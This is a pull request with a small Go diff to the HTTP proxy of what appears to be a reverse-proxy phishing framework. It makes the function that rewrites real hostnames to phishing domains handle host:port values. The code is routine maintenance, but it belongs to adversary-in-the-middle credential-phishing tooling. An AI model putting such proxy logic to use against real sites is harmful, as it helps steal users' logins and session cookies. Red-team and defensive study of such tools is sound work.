### PR TITLE
Handled the case of host:port in replaceHostWithPhished

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -749,6 +749,12 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) {
 		return hostname, false
 	}
 	prefix := ""
+	port := ""
+	if strings.Contains(hostname, ":") {
+		s := strings.Split(hostname, ":")
+		hostname = s[0]
+		port = s[1]
+	}
 	if hostname[0] == '.' {
 		prefix = "."
 		hostname = hostname[1:]
@@ -758,6 +764,9 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) {
 			phishDomain, ok := p.cfg.GetSiteDomain(pl.Name)
 			if !ok {
 				continue
+			}
+			if port != "" && !strings.Contains(phishDomain, ":") {
+				phishDomain = phishDomain + ":" + port
 			}
 			for _, ph := range pl.proxyHosts {
 				if hostname == ph.domain {


### PR DESCRIPTION
The change handles the case of having the hostname:port format in the server response. It removes the port from the hostname while checking if there is a match in the yaml file. If the proxy_host already has a domain:port format (I just check if there is `:` in the string) then it won't add it back in the `return` of `replaceHostWithPhished`.